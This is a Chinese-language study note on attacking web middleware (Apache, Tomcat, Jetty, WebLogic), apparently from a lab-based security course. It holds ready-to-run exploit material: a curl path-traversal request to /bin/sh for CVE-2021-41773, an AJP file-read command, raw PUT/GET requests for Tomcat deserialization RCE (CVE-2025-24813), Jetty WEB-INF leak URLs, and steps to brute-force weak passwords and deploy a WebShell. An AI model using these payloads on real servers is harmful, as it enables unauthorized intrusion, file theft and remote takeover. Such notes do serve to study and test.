Day123_中间件安全

Apache

Apache 基金会开源的一款流行的 HTTP 服务器。

• SSRF 漏洞：CVE-2021-40438

  版本：2.4.48

• 路径穿越漏洞：CVE-2021-41773, CVE-2021-42013

  版本：2.4.49, 2.4.50

  curl -v --path-as-is http://123.58.224.8:19615/icons/.32%65/.32%65/.32%65/.32%65/.32%65/.32%65/.32%65/bin/sh'
   

Tomcat

一个开源的 Java Servlet 容器和 Web 服务器。

• 控制台利用（配置不当）

  条件：口令登录控制台

  Tomcat 支持在控制台部署 war 文件，可直接将 WebShell 部署到 Web 目录下。

  • 步骤：
    • 爆破弱口令
    • 压缩后门 zip 改 war
    • 上传 war 访问后门链接

• AJP 文件包含漏洞：CVE-2020-1938

  Apache Tomcat AJP 协议（默认 8009 端口）因实现缺陷导致参数可控，攻击者可通过构造参数读取 webapp 目录下任意文件，或结合文件上传功能实现远程代码执行。

  影响版本：

  • Tomcat 6.*
  • Tomcat 7.* < 7.0.100
  • Tomcat 8.* < 8.5.51
  • Tomcat 9.* < 9.0.31工具：CNVD-2020-10487-Tomcat-Ajp-lfi

  d:\Python27\python.exe CNVD-2020-10487-Tomcat-Ajp-lfi.py 123.58.224.8 -p 14728 -f WEB-INF/web.xml

• 远程代码执行漏洞：CVE-2025-24813

  复现参考：CNBlogs

  影响版本：

  • 11.0.0-M1 ≤ Apache Tomcat ≤ 11.0.2
  • 10.1.0-M1 ≤ Apache Tomcat ≤ 10.1.34
  • 9.0.0.M1 ≤ Apache Tomcat ≤ 9.0.98

  访问或修改敏感文件条件：

  • DefaultServlet 启用写入权限（默认禁用）。
  • 服务器启用 partial PUT（默认启用）。
  • 敏感文件位于允许上传目录的子路径（攻击者需能在上级路径使用 partial PUT 上传文件）。
  • 攻击者已知目标敏感文件的路径及文件名。
  • 敏感文件通过 partial PUT 上传。

  远程代码执行 (RCE) 条件：

  • DefaultServlet 启用写入权限（默认禁用）。
  • 服务器启用 partial PUT（默认启用）。
  • Tomcat 使用基于文件的 Session 持久化机制（非默认，默认为内存持久化），且存储路径为默认路径。
  • 应用程序包含可利用的反序列化漏洞库（如 Commons-Collections 3.x）。

  Yakit 发包：

  1. 提交序列化数据

     PUT /deserialize/session HTTP/1.1
     Host: 192.168.1.7:8080
     Content-Length: 1234
     Content-Range: bytes 0-5/10
     
     {{base64dec(javachains项目生成序列化base64数据)}}
     
     

  2. 访问触发序列化

     GET / HTTP/1.1
     Host: 192.168.1.7:8080
     Cookie: JSESSIONID=.deserialize
     
     

Jetty

一个开源的 Servlet 容器，为基于 Java 的 Web 容器提供运行环境。

• 信息泄露漏洞：CVE-2021-28169

  版本：≤ 9.4.40, ≤ 10.0.2, ≤ 11.0.2

  对带有双重编码路径的 ConcatServlet 请求可访问 WEB-INF 目录中的受保护资源。

  示例：

  curl -v http://123.58.224.8:16187/static?/%2557EB-INF/web.xml
   

• 信息泄露漏洞：CVE-2021-34429

  版本：9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5

  使用编码字符制作 URI 可访问 WEB-INF 目录内容或绕过安全限制。

  示例：

  GET /%u002e/WEB-INF/web.xml
  
  

Weblogic

一个基于 Java 的企业级应用服务器。

特征：端口 7001 和页面。

• 弱口令、部署 WebShell

  参考默认密码：CIRT.net

  部署步骤：

  • 概要 → 安装 → 制作 war 并上传 → 修改路由 → 访问

  • 制作 war：

    jar cvf 1.war 1.jsp

• 未授权远程 RCE 漏洞：CVE-2023-21839, CVE-2020-14882

  工具：WeblogicTool

  相关漏洞：

  • CVE-2023-21931 (JNDI)
  • CVE-2023-21839 (JNDI)
  • CVE-2020-2551 (JRMP)
  • CVE-2020-2551
  • CVE-2020-2555
  • CVE-2020-2883
  • CVE-2020-14882 (未授权访问)
  • CVE-2018-2894
  • CVE-2018-2628 (JRMP)
  • CVE-2018-2893 (JRMP)
  • CVE-2018-3245 (JRMP)
  • CVE-2018-3252 (JRMP)
  • CVE-2018-3191
  • CVE-2016-3510
  • CVE-2016-0638
  • CVE-2017-10271
  • CVE-2017-3248 (JRMP)
  • CVE-2015-4852